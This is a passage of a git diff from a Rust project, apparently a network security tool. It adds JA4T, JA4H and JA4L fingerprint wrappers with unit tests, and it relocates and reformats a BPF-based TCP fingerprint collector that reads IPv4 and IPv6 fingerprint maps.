Re-export nstealth types that are API-compatible +pub use nstealth::{Ja4s as Ja4sFingerprint, Ja4x as Ja4xFingerprint}; + +/// JA4T: TCP Fingerprint from TCP options +/// Wrapper around nstealth::Ja4t with backward-compatible interface +#[derive(Debug, Clone)] +pub struct Ja4tFingerprint { + #[allow(dead_code)] + inner: Ja4t, + pub fingerprint: String, + pub window_size: u16, + pub ttl: u16, // Not in JA4T spec, kept for logging compatibility + pub mss: u16, + pub window_scale: u8, + pub options: Vec, +} + +impl Ja4tFingerprint { + /// Generate JA4T fingerprint from TCP parameters + pub fn from_tcp_data( + window_size: u16, + ttl: u16, + mss: u16, + window_scale: u8, + options: &[u8], + ) -> Self { + // Parse raw options to extract option kinds + let inner = Ja4t::from_raw_options(window_size, options); + let fingerprint = inner.fingerprint(); + + Self { + fingerprint, + window_size: inner.window_size, + ttl, // Store TTL for logging (not part of JA4T spec) + mss: inner.mss.unwrap_or(mss), + window_scale: inner.window_scale.unwrap_or(window_scale), + options: inner.tcp_options.clone(), + inner, + } + } + + /// Get the JA4T hash (first 12 characters of SHA-256) + pub fn hash(&self) -> String { + nstealth::hash12(&self.fingerprint) + } +} + +/// JA4H: HTTP Header Fingerprint +/// Wrapper around nstealth::Ja4h with backward-compatible interface +#[derive(Debug, Clone)] +pub struct Ja4hFingerprint { + #[allow(dead_code)] + inner: Ja4h, + pub fingerprint: String, + pub method: String, + pub version: String, + pub has_cookie: bool, + pub has_referer: bool, + pub header_count: usize, + pub language: String, +} + +impl Ja4hFingerprint { + /// Generate JA4H fingerprint from HTTP request + pub fn from_http_request(method: &str, version: &str, headers: &HeaderMap) -> Self { + // Extract header names + let header_names: Vec<&str> = headers.keys().map(|k| k.as_str()).collect(); + + // Get cookie header value + let cookie_header = headers.get("cookie").and_then(|v| v.to_str().ok()); + + // Get accept-language header value + let accept_language = headers.get("accept-language").and_then(|v| v.to_str().ok()); + + // Check if referer header exists + let has_referer = headers.contains_key("referer"); + let has_cookie = headers.contains_key("cookie"); + + // Create nstealth Ja4h + let inner = Ja4h::from_http_request( + method, + version, + &header_names, + cookie_header, + accept_language, + has_referer, + ); + + let fingerprint = inner.fingerprint(); + + // Extract language for backward compatibility + let language = accept_language + .map(|l| { + let primary = l.split(',').next().unwrap_or(""); + let clean = primary + .split(';') + .next() + .unwrap_or("") + .replace('-', "") + .to_lowercase(); + let mut result: String = clean.chars().take(4).collect(); + while result.len() < 4 { + result.push('0'); + } + result + }) + .unwrap_or_else(|| "0000".to_string()); + + // Count headers excluding Cookie and Referer + let header_count = header_names + .iter() + .filter(|h| { + let lower = h.to_lowercase(); + lower != "cookie" && lower != "referer" + }) + .count(); + + Self { + fingerprint, + inner, + method: method.to_string(), + version: version.to_string(), + has_cookie, + has_referer, + header_count, + language, + } + } +} + +/// JA4L: Latency Fingerprint +/// Wrapper around nstealth::Ja4l with backward-compatible builder interface +#[derive(Debug, Clone, Default)] +pub struct Ja4lMeasurement { + pub syn_time: Option, + pub synack_time: Option, + pub ack_time: Option, + pub ttl_client: Option, + pub ttl_server: Option, +} + +impl Ja4lMeasurement { + pub fn new() -> Self { + Self::default() + } + + /// Record SYN packet timestamp + pub fn set_syn(&mut self, timestamp_us: u64, ttl: u8) { + self.syn_time = Some(timestamp_us); + self.ttl_client = Some(ttl); + } + + /// Record SYNACK packet timestamp + pub fn set_synack(&mut self, timestamp_us: u64, ttl: u8) { + self.synack_time = Some(timestamp_us); + self.ttl_server = Some(ttl); + } + + /// Record ACK packet timestamp + pub fn set_ack(&mut self, timestamp_us: u64) { + self.ack_time = Some(timestamp_us); + } + + /// Generate JA4L client fingerprint using nstealth + pub fn fingerprint_client(&self) -> Option { + let ja4l = Ja4l::new( + self.syn_time?, + self.synack_time?, + self.ack_time?, + self.ttl_client?, + self.ttl_server?, + ); + Some(ja4l.client_fingerprint()) + } + + /// Generate JA4L server fingerprint using nstealth + pub fn fingerprint_server(&self) -> Option { + let ja4l = Ja4l::new( + self.syn_time?, + self.synack_time?, + self.ack_time?, + self.ttl_client?, + self.ttl_server?, + ); + Some(ja4l.server_fingerprint()) + } + + /// Legacy format for compatibility + pub fn fingerprint_combined(&self) -> Option { + let client = self.fingerprint_client()?; + let server = self.fingerprint_server()?; + Some(format!("c:{},s:{}", client, server)) + } +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_ja4t_fingerprint() { + // MSS option: kind=2, len=4, value=1460 (0x05b4) + // Window Scale option: kind=3, len=3, value=7 + let options = vec![ + 2, 4, 0x05, 0xb4, // MSS + 3, 3, 7, // Window Scale + 0, // EOL + ]; + + let ja4t = Ja4tFingerprint::from_tcp_data( + 65535, // window_size + 64, // ttl + 1460, // mss (fallback) + 7, // window_scale (fallback) + &options, + ); + + assert_eq!(ja4t.window_size, 65535); + assert_eq!(ja4t.ttl, 64); + assert_eq!(ja4t.mss, 1460); + assert_eq!(ja4t.window_scale, 7); + assert!(!ja4t.hash().is_empty()); + assert_eq!(ja4t.hash().len(), 12); + } + + #[test] + fn test_ja4h_fingerprint() { + let mut headers = HeaderMap::new(); + headers.insert("user-agent", "Mozilla/5.0".parse().unwrap()); + headers.insert("accept", "*/*".parse().unwrap()); + headers.insert("accept-language", "en-US,en;q=0.9".parse().unwrap()); + headers.insert("cookie", "session=abc123; id=xyz789".parse().unwrap()); + headers.insert("referer", "https://example.com".parse().unwrap()); + + let ja4h = Ja4hFingerprint::from_http_request("GET", "HTTP/1.1", &headers); + + assert_eq!(ja4h.method, "GET"); + assert_eq!(ja4h.version, "HTTP/1.1"); + assert!(ja4h.has_cookie); + assert!(ja4h.has_referer); + assert_eq!(ja4h.language, "enus"); + // Should start with method and version codes + assert!(ja4h.fingerprint.starts_with("ge11")); + // Should have 4 parts separated by underscores + assert_eq!(ja4h.fingerprint.matches('_').count(), 3); + } + + #[test] + fn test_ja4l_measurement() { + let mut ja4l = Ja4lMeasurement::new(); + + ja4l.set_syn(1000000, 64); + ja4l.set_synack(1025000, 128); + ja4l.set_ack(1050000); + + let client_fp = ja4l.fingerprint_client().unwrap(); + let server_fp = ja4l.fingerprint_server().unwrap(); + + // Verify fingerprints are generated + assert!(!client_fp.is_empty()); + assert!(!server_fp.is_empty()); + assert!(client_fp.contains('_')); + assert!(server_fp.contains('_')); + } +} diff --git a/src/utils/fingerprint/mod.rs b/src/utils/fingerprint/mod.rs new file mode 100644 index 0000000..e5cb35e --- /dev/null +++ b/src/utils/fingerprint/mod.rs @@ -0,0 +1,6 @@ +pub mod ja4_plus; +#[cfg(all(feature = "bpf", not(feature = "disable-bpf")))] +pub mod tcp_fingerprint; +#[cfg(any(not(feature = "bpf"), feature = "disable-bpf"))] +#[path = "tcp_fingerprint_noop.rs"] +pub mod tcp_fingerprint; diff --git a/src/utils/tcp_fingerprint.rs b/src/utils/fingerprint/tcp_fingerprint.rs similarity index 65% rename from src/utils/tcp_fingerprint.rs rename to src/utils/fingerprint/tcp_fingerprint.rs index 6d34ab1..2252cbd 100644 --- a/src/utils/tcp_fingerprint.rs +++ b/src/utils/fingerprint/tcp_fingerprint.rs @@ -1,11 +1,11 @@ -use std::sync::Arc; -use serde::{Deserialize, Serialize}; +use crate::worker::log::{UnifiedEvent, send_event}; use chrono::{DateTime, Utc}; -use std::net::Ipv4Addr; use libbpf_rs::MapCore; -use crate::worker::log::{send_event, UnifiedEvent}; +use serde::{Deserialize, Serialize}; +use std::net::Ipv4Addr; +use std::sync::Arc; -use crate::bpf::FilterSkel; +use crate::security::firewall::bpf::FilterSkel; /// TCP fingerprinting configuration #[derive(Debug, Clone, Serialize, Deserialize)] @@ -33,7 +33,7 @@ impl Default for TcpFingerprintConfig { impl TcpFingerprintConfig { /// Convert from CLI configuration - pub fn from_cli_config(cli_config: &crate::cli::TcpFingerprintConfig) -> Self { + pub fn from_cli_config(cli_config: &crate::core::cli::TcpFingerprintConfig) -> Self { Self { enabled: cli_config.enabled, log_interval_secs: cli_config.log_interval_secs, @@ -103,7 +103,7 @@ pub struct TcpFingerprintEvent { pub mss: u16, pub window_size: u16, pub window_scale: u8, - pub packet_count: u32 + pub packet_count: u32, } /// Collection of TCP fingerprint events @@ -148,25 +148,37 @@ impl TcpFingerprintEvents { /// Generate summary string pub fn summary(&self) -> String { - format!("TCP Fingerprint Events: {} events from {} unique IPs", - self.total_events, self.unique_ips) + format!( + "TCP Fingerprint Events: {} events from {} unique IPs", + self.total_events, self.unique_ips + ) } } impl TcpFingerprintEvent { /// Generate summary string pub fn summary(&self) -> String { - format!("TCP Fingerprint: {}:{} {} (TTL:{}, MSS:{}, Window:{}, Scale:{}, Packets:{})", - self.src_ip, self.src_port, self.fingerprint, - self.ttl, self.mss, self.window_size, self.window_scale, self.packet_count) + format!( + "TCP Fingerprint: {}:{} {} (TTL:{}, MSS:{}, Window:{}, Scale:{}, Packets:{})", + self.src_ip, + self.src_port, + self.fingerprint, + self.ttl, + self.mss, + self.window_size, + self.window_scale, + self.packet_count + ) } } impl UniqueFingerprintStats { /// Generate summary string pub fn summary(&self) -> String { - format!("Unique Fingerprint Stats: {} patterns, {} unique IPs, {} total packets", - self.total_unique_patterns, self.total_unique_ips, self.total_packets) + format!( + "Unique Fingerprint Stats: {} patterns, {} unique IPs, {} total packets", + self.total_unique_patterns, self.total_unique_ips, self.total_packets + ) } /// Convert to JSON string @@ -178,12 +190,19 @@ impl UniqueFingerprintStats { impl TcpFingerprintStats { /// Generate summary string pub fn summary(&self) -> String { - let mut summary = format!("TCP Fingerprint Stats: {} SYN packets, {} unique fingerprints, {} total entries", - self.syn_stats.total_syns, self.syn_stats.unique_fingerprints, self.total_unique_fingerprints); + let mut summary = format!( + "TCP Fingerprint Stats: {} SYN packets, {} unique fingerprints, {} total entries", + self.syn_stats.total_syns, + self.syn_stats.unique_fingerprints, + self.total_unique_fingerprints + ); // Add top unique fingerprints if any if !self.fingerprints.is_empty() { - summary.push_str(&format!(", {} unique fingerprints found", self.fingerprints.len())); + summary.push_str(&format!( + ", {} unique fingerprints found", + self.fingerprints.len() + )); // Show top 5 fingerprints by packet count let mut fingerprint_vec: Vec<_> = self.fingerprints.iter().collect(); @@ -192,9 +211,16 @@ impl TcpFingerprintStats { if !fingerprint_vec.is_empty() { summary.push_str(", Top fingerprints: "); for (i, entry) in fingerprint_vec.iter().take(5).enumerate() { - if i > 0 { summary.push_str(", "); } - summary.push_str(&format!("{}:{}:{}:{}", - entry.key.src_ip, entry.key.src_port, entry.key.fingerprint, entry.data.packet_count)); + if i > 0 { + summary.push_str(", "); + } + summary.push_str(&format!( + "{}:{}:{}:{}", + entry.key.src_ip, + entry.key.src_port, + entry.key.fingerprint, + entry.data.packet_count + )); } } } @@ -204,7 +230,8 @@ impl TcpFingerprintStats { } /// Global TCP fingerprint collector -static TCP_FINGERPRINT_COLLECTOR: std::sync::OnceLock> = std::sync::OnceLock::new(); +static TCP_FINGERPRINT_COLLECTOR: std::sync::OnceLock> = + std::sync::OnceLock::new(); /// Set the global TCP fingerprint collector pub fn set_global_tcp_fingerprint_collector(collector: TcpFingerprintCollector) { @@ -235,7 +262,10 @@ impl TcpFingerprintCollector { } /// Create a new TCP fingerprint collector with configuration - pub fn new_with_config(skels: Vec>>, config: TcpFingerprintConfig) -> Self { + pub fn new_with_config( + skels: Vec>>, + config: TcpFingerprintConfig, + ) -> Self { Self { skels, enabled: config.enabled, @@ -254,7 +284,11 @@ impl TcpFingerprintCollector { } /// Lookup TCP fingerprint for a specific source IP and port - pub fn lookup_fingerprint(&self, src_ip: std::net::IpAddr, src_port: u16) -> Option { + pub fn lookup_fingerprint( + &self, + src_ip: std::net::IpAddr, + src_port: u16, + ) -> Option { if !self.enabled || self.skels.is_empty() { return None; } @@ -266,43 +300,76 @@ impl TcpFingerprintCollector { // Try to find fingerprint in any skeleton's IPv4 map for skel in &self.skels { - if let Ok(iter) = skel.maps.tcp_fingerprints.lookup_batch(1000, libbpf_rs::MapFlags::ANY, libbpf_rs::MapFlags::ANY) { + if let Ok(iter) = skel.maps.tcp_fingerprints.lookup_batch( + 1000, + libbpf_rs::MapFlags::ANY, + libbpf_rs::MapFlags::ANY, + ) { for (key_bytes, value_bytes) in iter { if key_bytes.len() >= 6 && value_bytes.len() >= 32 { // Parse key structure: src_ip (4 bytes BE), src_port (2 bytes BE), fingerprint (14 bytes) // BPF stores IP as __be32 (big-endian), so read as big-endian - let key_ip = u32::from_be_bytes([key_bytes[0], key_bytes[1], key_bytes[2], key_bytes[3]]); + let key_ip = u32::from_be_bytes([ + key_bytes[0], + key_bytes[1], + key_bytes[2], + key_bytes[3], + ]); let key_port = u16::from_be_bytes([key_bytes[4], key_bytes[5]]); if key_ip == src_ip_be && key_port == src_port { // Parse value structure if value_bytes.len() >= 32 { let first_seen = u64::from_ne_bytes([ - value_bytes[0], value_bytes[1], value_bytes[2], value_bytes[3], - value_bytes[4], value_bytes[5], value_bytes[6], value_bytes[7] + value_bytes[0], + value_bytes[1], + value_bytes[2], + value_bytes[3], + value_bytes[4], + value_bytes[5], + value_bytes[6], + value_bytes[7], ]); let last_seen = u64::from_ne_bytes([ - value_bytes[8], value_bytes[9], value_bytes[10], value_bytes[11], - value_bytes[12], value_bytes[13], value_bytes[14], value_bytes[15] + value_bytes[8], + value_bytes[9], + value_bytes[10], + value_bytes[11], + value_bytes[12], + value_bytes[13], + value_bytes[14], + value_bytes[15], ]); let packet_count = u32::from_ne_bytes([ - value_bytes[16], value_bytes[17], value_bytes[18], value_bytes[19] + value_bytes[16], + value_bytes[17], + value_bytes[18], + value_bytes[19], ]); - let ttl = u16::from_ne_bytes([value_bytes[20], value_bytes[21]]); - let mss = u16::from_ne_bytes([value_bytes[22], value_bytes[23]]); - let window_size = u16::from_ne_bytes([value_bytes[24], value_bytes[25]]); + let ttl = + u16::from_ne_bytes([value_bytes[20], value_bytes[21]]); + let mss = + u16::from_ne_bytes([value_bytes[22], value_bytes[23]]); + let window_size = + u16::from_ne_bytes([value_bytes[24], value_bytes[25]]); let window_scale = value_bytes[26]; let options_len = value_bytes[27]; let options_size = options_len.min(16) as usize; let mut options = vec![0u8; options_size]; if value_bytes.len() >= 28 + options_size { - options.copy_from_slice(&value_bytes[28..28 + options_size]); + options.copy_from_slice( + &value_bytes[28..28 + options_size], + ); } return Some(TcpFingerprintData { - first_seen: DateTime::from_timestamp_nanos(first_seen as i64), - last_seen: DateTime::from_timestamp_nanos(last_seen as i64), + first_seen: DateTime::from_timestamp_nanos( + first_seen as i64, + ), + last_seen: DateTime::from_timestamp_nanos( + last_seen as i64, + ), packet_count, ttl, mss, @@ -324,7 +391,11 @@ impl TcpFingerprintCollector { // Try to find fingerprint in any skeleton's IPv6 map for skel in &self.skels { - if let Ok(iter) = skel.maps.tcp_fingerprints_v6.lookup_batch(1000, libbpf_rs::MapFlags::ANY, libbpf_rs::MapFlags::ANY) { + if let Ok(iter) = skel.maps.tcp_fingerprints_v6.lookup_batch( + 1000, + libbpf_rs::MapFlags::ANY, + libbpf_rs::MapFlags::ANY, + ) { for (key_bytes, value_bytes) in iter { if key_bytes.len() >= 18 && value_bytes.len() >= 32 { // Parse key structure: src_ip (16 bytes), src_port (2 bytes BE), fingerprint (14 bytes) @@ -336,31 +407,55 @@ impl TcpFingerprintCollector { // Parse value structure (same as IPv4) if value_bytes.len() >= 32 { let first_seen = u64::from_ne_bytes([ - value_bytes[0], value_bytes[1], value_bytes[2], value_bytes[3], - value_bytes[4], value_bytes[5], value_bytes[6], value_bytes[7] + value_bytes[0], + value_bytes[1], + value_bytes[2], + value_bytes[3], + value_bytes[4], + value_bytes[5], + value_bytes[6], + value_bytes[7], ]); let last_seen = u64::from_ne_bytes([ - value_bytes[8], value_bytes[9], value_bytes[10], value_bytes[11], - value_bytes[12], value_bytes[13], value_bytes[14], value_bytes[15] + value_bytes[8], + value_bytes[9], + value_bytes[10], + value_bytes[11], + value_bytes[12], + value_bytes[13], + value_bytes[14], + value_bytes[15], ]); let packet_count = u32::from_ne_bytes([ - value_bytes[16], value_bytes[17], value_bytes[18], value_bytes[19] + value_bytes[16], + value_bytes[17], + value_bytes[18], + value_bytes[19], ]); - let ttl = u16::from_ne_bytes([value_bytes[20], value_bytes[21]]); - let mss = u16::from_ne_bytes([value_bytes[22], value_bytes[23]]); - let window_size = u16::from_ne_bytes([value_bytes[24], value_bytes[25]]); + let ttl = + u16::from_ne_bytes([value_bytes[20], value_bytes[21]]); + let mss = + u16::from_ne_bytes([value_bytes[22], value_bytes[23]]); + let window_size = + u16::from_ne_bytes([value_bytes[24], value_bytes[25]]); let window_scale = value_bytes[26]; let options_len = value_bytes[27]; let options_size = options_len.min(16) as usize; let mut options = vec![0u8; options_size]; if value_bytes.len() >= 28 + options_size { - options.copy_from_slice(&value_bytes[28..28 + options_size]); + options.copy_from_slice( + &value_bytes[28..28 + options_size], + ); } return Some(TcpFingerprintData { - first_seen: DateTime::from_timestamp_nanos(first_seen as i64), - last_seen: DateTime::from_timestamp_nanos(last_seen as i64), + first_seen: DateTime::from_timestamp_nanos( + first_seen as i64, + ), + last_seen: DateTime::from_timestamp_nanos( + last_seen as i64, + ), packet_count, ttl, mss, @@ -381,7 +476,9 @@ impl TcpFingerprintCollector { } /// Collect TCP fingerprint statistics from all BPF skeletons - pub fn collect_fingerprint_stats(&self) -> Result, Box> { + pub fn collect_fingerprint_stats( + &self, + ) -> Result, Box> { if !self.enabled { return Ok(vec![]); } @@ -391,11 +488,19 @@ impl TcpFingerprintCollector { log::debug!("Collecting TCP fingerprint stats from skeleton {}", i); match self.collect_fingerprint_stats_from_skeleton(skel) { Ok(stat) => { - log::debug!("Skeleton {} collected {} fingerprints", i, stat.fingerprints.len()); + log::debug!( + "Skeleton {} collected {} fingerprints", + i, + stat.fingerprints.len() + ); stats.push(stat); } Err(e) => { - log::warn!("Failed to collect TCP fingerprint stats from skeleton {}: {}", i, e); + log::warn!( + "Failed to collect TCP fingerprint stats from skeleton {}: {}", + i, + e + ); } } } @@ -404,7 +509,10 @@ impl TcpFingerprintCollector { } /// Collect TCP fingerprint statistics from a single BPF skeleton - fn collect_fingerprint_stats_from_skeleton(&self, skel: &FilterSkel) -> Result> { + fn collect_fingerprint_stats_from_skeleton( + &self, + skel: &FilterSkel, + ) -> Result> { if !self.enabled { return Ok(TcpFingerprintStats { timestamp: Utc::now(), @@ -423,12 +531,19 @@ impl TcpFingerprintCollector { // Read TCP SYN statistics log::debug!("Reading TCP SYN statistics from skeleton"); let syn_stats = self.collect_syn_stats(skel)?; - log::debug!("TCP SYN stats: {} total_syns, {} unique_fingerprints", syn_stats.total_syns, syn_stats.unique_fingerprints); + log::debug!( + "TCP SYN stats: {} total_syns, {} unique_fingerprints", + syn_stats.total_syns, + syn_stats.unique_fingerprints + ); // Read TCP fingerprints from BPF map log::debug!("Reading TCP fingerprints from skeleton"); self.collect_tcp_fingerprints(skel, &mut fingerprints)?; - log::debug!("Collected {} fingerprints from skeleton", fingerprints.len()); + log::debug!( + "Collected {} fingerprints from skeleton", + fingerprints.len() + ); let total_unique_fingerprints = fingerprints.len() as u64; @@ -441,12 +556,17 @@ impl TcpFingerprintCollector { } /// Collect aggregated TCP fingerprint statistics across all skeletons - pub fn collect_aggregated_stats(&self) -> Result> { + pub fn collect_aggregated_stats( + &self, + ) -> Result> { if !self.enabled { return Err("TCP fingerprint collection is disabled".into()); } - log::debug!("Collecting aggregated TCP fingerprint statistics from {} skeletons", self.skels.len()); + log::debug!( + "Collecting aggregated TCP fingerprint statistics from {} skeletons", + self.skels.len() + ); let individual_stats = self.collect_fingerprint_stats()?; log::debug!("Collected {} individual stats", individual_stats.len()); @@ -467,7 +587,8 @@ impl TcpFingerprintCollector { total_unique_fingerprints: 0, }; - let mut all_fingerprints: std::collections::HashMap = std::collections::HashMap::new(); + let mut all_fingerprints: std::collections::HashMap = + std::collections::HashMap::new(); for stat in individual_stats { aggregated.syn_stats.total_syns += stat.syn_stats.total_syns; @@ -475,7 +596,10 @@ impl TcpFingerprintCollector { // Merge fingerprints by key (src_ip:src_port:fingerprint) for entry in stat.fingerprints { - let key = format!("{}:{}:{}", entry.key.src_ip, entry.key.src_port, entry.key.fingerprint); + let key = format!( + "{}:{}:{}", + entry.key.src_ip, entry.key.src_port, entry.key.fingerprint + ); match all_fingerprints.get_mut(&key) { Some(existing) => { // Update packet count and timestamps @@ -501,24 +625,30 @@ impl TcpFingerprintCollector { } /// Collect TCP SYN statistics - fn collect_syn_stats(&self, skel: &FilterSkel) -> Result> { + fn collect_syn_stats( + &self, + skel: &FilterSkel, + ) -> Result> { let key = 0u32.to_le_bytes(); - let stats_bytes = skel.maps.tcp_syn_stats.lookup(&key, libbpf_rs::MapFlags::ANY) + let stats_bytes = skel + .maps + .tcp_syn_stats + .lookup(&key, libbpf_rs::MapFlags::ANY) .map_err(|e| format!("Failed to read TCP SYN stats: {}", e))?; if let Some(bytes) = stats_bytes { - if bytes.len() >= 24 { // 3 * u64 = 24 bytes + if bytes.len() >= 24 { + // 3 * u64 = 24 bytes let total_syns = u64::from_le_bytes([ - bytes[0], bytes[1], bytes[2], bytes[3], - bytes[4], bytes[5], bytes[6], bytes[7], + bytes[0], bytes[1], bytes[2], bytes[3], bytes[4], bytes[5], bytes[6], bytes[7], ]); let unique_fingerprints = u64::from_le_bytes([ - bytes[8], bytes[9], bytes[10], bytes[11], - bytes[12], bytes[13], bytes[14], bytes[15], + bytes[8], bytes[9], bytes[10], bytes[11], bytes[12], bytes[13], bytes[14], + bytes[15], ]); let _last_reset = u64::from_le_bytes([ - bytes[16], bytes[17], bytes[18], bytes[19], - bytes[20], bytes[21], bytes[22], bytes[23], + bytes[16], bytes[17], bytes[18], bytes[19], bytes[20], bytes[21], bytes[22], + bytes[23], ]); Ok(TcpSynStats { @@ -543,7 +673,11 @@ impl TcpFingerprintCollector { } /// Collect TCP fingerprints from BPF map - fn collect_tcp_fingerprints(&self, skel: &FilterSkel, fingerprints: &mut Vec) -> Result<(), Box> { + fn collect_tcp_fingerprints( + &self, + skel: &FilterSkel, + fingerprints: &mut Vec, + ) -> Result<(), Box> { log::debug!("Collecting TCP fingerprints from BPF map (IPv4)"); let mut count = 0; @@ -552,15 +686,25 @@ impl TcpFingerprintCollector { // Helper closure to process a single entry let mut process_entry = |key_bytes: &[u8], value_bytes: &[u8]| { - log::debug!("Processing IPv4 fingerprint entry: key_len={}, value_len={}", key_bytes.len(), value_bytes.len()); + log::debug!( + "Processing IPv4 fingerprint entry: key_len={}, value_len={}", + key_bytes.len(), + value_bytes.len() + ); if key_bytes.len() >= 20 && value_bytes.len() >= 48 { - let src_ip = Ipv4Addr::from([key_bytes[0], key_bytes[1], key_bytes[2], key_bytes[3]]); + let src_ip = + Ipv4Addr::from([key_bytes[0], key_bytes[1], key_bytes[2], key_bytes[3]]); let src_port = u16::from_le_bytes([key_bytes[4], key_bytes[5]]); - let fingerprint = String::from_utf8_lossy(&key_bytes[6..20]).trim_end_matches('\0').to_string(); + let fingerprint = String::from_utf8_lossy(&key_bytes[6..20]) + .trim_end_matches('\0') + .to_string(); let packet_count = u32::from_le_bytes([ - value_bytes[16], value_bytes[17], value_bytes[18], value_bytes[19], + value_bytes[16], + value_bytes[17], + value_bytes[18], + value_bytes[19], ]); let ttl = u16::from_le_bytes([value_bytes[20], value_bytes[21]]); let mss = u16::from_le_bytes([value_bytes[22], value_bytes[23]]); @@ -590,29 +734,55 @@ impl TcpFingerprintCollector { }, }; - log::debug!("TCP Fingerprint: {}:{} - TTL:{} MSS:{} Window:{} Scale:{} Packets:{} Fingerprint:{}", - src_ip, src_port, ttl, mss, window_size, window_scale, packet_count, fingerprint); + log::debug!( + "TCP Fingerprint: {}:{} - TTL:{} MSS:{} Window:{} Scale:{} Packets:{} Fingerprint:{}", + src_ip, + src_port, + ttl, + mss, + window_size, + window_scale, + packet_count, + fingerprint + ); fingerprints.push(entry); return (true, false); // (processed, skipped) } else { - log::debug!("Skipping fingerprint entry with packet_count={} (threshold={}): {}:{}", - packet_count, self.config.min_packet_count, src_ip, src_port); + log::debug!( + "Skipping fingerprint entry with packet_count={} (threshold={}): {}:{}", + packet_count, + self.config.min_packet_count, + src_ip, + src_port + ); return (false, true); } } else { - log::debug!("Skipping fingerprint entry with invalid size: key_len={}, value_len={}", key_bytes.len(), value_bytes.len()); + log::debug!( + "Skipping fingerprint entry with invalid size: key_len={}, value_len={}", + key_bytes.len(), + value_bytes.len() + ); return (false, true); } }; // Try batch lookup first - if let Ok(batch_iter) = skel.maps.tcp_fingerprints.lookup_batch(1000, libbpf_rs::MapFlags::ANY, libbpf_rs::MapFlags::ANY) { + if let Ok(batch_iter) = skel.maps.tcp_fingerprints.lookup_batch( + 1000, + libbpf_rs::MapFlags::ANY, + libbpf_rs::MapFlags::ANY, + ) { for (key_bytes, value_bytes) in batch_iter { batch_worked = true; let (processed, skipped) = process_entry(&key_bytes, &value_bytes); - if processed { count += 1; } - if skipped { skipped_count += 1; } + if processed { + count += 1; + } + if skipped { + skipped_count += 1; + } } } @@ -621,49 +791,99 @@ impl TcpFingerprintCollector { log::debug!("Batch lookup empty, trying keys iterator for IPv4 TCP fingerprints"); for key_bytes in skel.maps.tcp_fingerprints.keys() { if key_bytes.len() >= 20 { - if let Ok(Some(value_bytes)) = skel.maps.tcp_fingerprints.lookup(&key_bytes, libbpf_rs::MapFlags::ANY) { + if let Ok(Some(value_bytes)) = skel + .maps + .tcp_fingerprints + .lookup(&key_bytes, libbpf_rs::MapFlags::ANY) + { let (processed, skipped) = process_entry(&key_bytes, &value_bytes); - if processed { count += 1; } - if skipped { skipped_count += 1; } + if processed { + count += 1; + } + if skipped { + skipped_count += 1; + } } } } } - log::debug!("Found {} IPv4 TCP fingerprints, skipped {} entries", count, skipped_count); + log::debug!( + "Found {} IPv4 TCP fingerprints, skipped {} entries", + count, + skipped_count + ); // Collect IPv6 fingerprints log::debug!("Collecting TCP fingerprints from BPF map (IPv6)"); - match skel.maps.tcp_fingerprints_v6.lookup_batch(1000, libbpf_rs::MapFlags::ANY, libbpf_rs::MapFlags::ANY) { + match skel.maps.tcp_fingerprints_v6.lookup_batch( + 1000, + libbpf_rs::MapFlags::ANY, + libbpf_rs::MapFlags::ANY, + ) { Ok(batch_iter) => { let mut count = 0; let mut skipped_count = 0; for (key_bytes, value_bytes) in batch_iter { - log::debug!("Processing IPv6 fingerprint entry: key_len={}, value_len={}", key_bytes.len(), value_bytes.len()); - - if key_bytes.len() >= 32 && value_bytes.len() >= 48 { // Key: 16+2+14, Value: same as IPv4 + log::debug!( + "Processing IPv6 fingerprint entry: key_len={}, value_len={}", + key_bytes.len(), + value_bytes.len() + ); + + if key_bytes.len() >= 32 && value_bytes.len() >= 48 { + // Key: 16+2+14, Value: same as IPv4 // Parse IPv6 address (16 bytes) let src_ip: std::net::Ipv6Addr = std::net::Ipv6Addr::from([ - key_bytes[0], key_bytes[1], key_bytes[2], key_bytes[3], - key_bytes[4], key_bytes[5], key_bytes[6], key_bytes[7], - key_bytes[8], key_bytes[9], key_bytes[10], key_bytes[11], - key_bytes[12], key_bytes[13], key_bytes[14], key_bytes[15] + key_bytes[0], + key_bytes[1], + key_bytes[2], + key_bytes[3], + key_bytes[4], + key_bytes[5], + key_bytes[6], + key_bytes[7], + key_bytes[8], + key_bytes[9], + key_bytes[10], + key_bytes[11], + key_bytes[12], + key_bytes[13], + key_bytes[14], + key_bytes[15], ]); let src_port = u16::from_le_bytes([key_bytes[16], key_bytes[17]]); - let fingerprint = String::from_utf8_lossy(&key_bytes[18..32]).trim_end_matches('\0').to_string(); + let fingerprint = String::from_utf8_lossy(&key_bytes[18..32]) + .trim_end_matches('\0') + .to_string(); // Parse fingerprint data (same structure as IPv4) let _first_seen = u64::from_le_bytes([ - value_bytes[0], value_bytes[1], value_bytes[2], value_bytes[3], - value_bytes[4], value_bytes[5], value_bytes[6], value_bytes[7], + value_bytes[0], + value_bytes[1], + value_bytes[2], + value_bytes[3], + value_bytes[4], + value_bytes[5], + value_bytes[6], + value_bytes[7], ]); let _last_seen = u64::from_le_bytes([ - value_bytes[8], value_bytes[9], value_bytes[10], value_bytes[11], - value_bytes[12], value_bytes[13], value_bytes[14], value_bytes[15], + value_bytes[8], + value_bytes[9], + value_bytes[10], + value_bytes[11], + value_bytes[12], + value_bytes[13], + value_bytes[14], + value_bytes[15], ]); let packet_count = u32::from_le_bytes([ - value_bytes[16], value_bytes[17], value_bytes[18], value_bytes[19], + value_bytes[16], + value_bytes[17], + value_bytes[18], + value_bytes[19], ]); let ttl = u16::from_le_bytes([value_bytes[20], value_bytes[21]]); let mss = u16::from_le_bytes([value_bytes[22], value_bytes[23]]); @@ -683,7 +903,7 @@ impl TcpFingerprintCollector { }, data: TcpFingerprintData { first_seen: Utc::now(), // Use current time as fallback - last_seen: Utc::now(), // Use current time as fallback + last_seen: Utc::now(), // Use current time as fallback packet_count, ttl, mss, @@ -695,22 +915,44 @@ impl TcpFingerprintCollector { }; // Log new IPv6 TCP fingerprint at debug level - log::debug!("TCP Fingerprint (IPv6): {}:{} - TTL:{} MSS:{} Window:{} Scale:{} Packets:{} Fingerprint:{}", - src_ip, src_port, ttl, mss, window_size, window_scale, packet_count, fingerprint); + log::debug!( + "TCP Fingerprint (IPv6): {}:{} - TTL:{} MSS:{} Window:{} Scale:{} Packets:{} Fingerprint:{}", + src_ip, + src_port, + ttl, + mss, + window_size, + window_scale, + packet_count, + fingerprint + ); fingerprints.push(entry); count += 1; } else { - log::debug!("Skipping IPv6 fingerprint entry with packet_count={} (threshold={}): {}:{}", - packet_count, self.config.min_packet_count, src_ip, src_port); + log::debug!( + "Skipping IPv6 fingerprint entry with packet_count={} (threshold={}): {}:{}", + 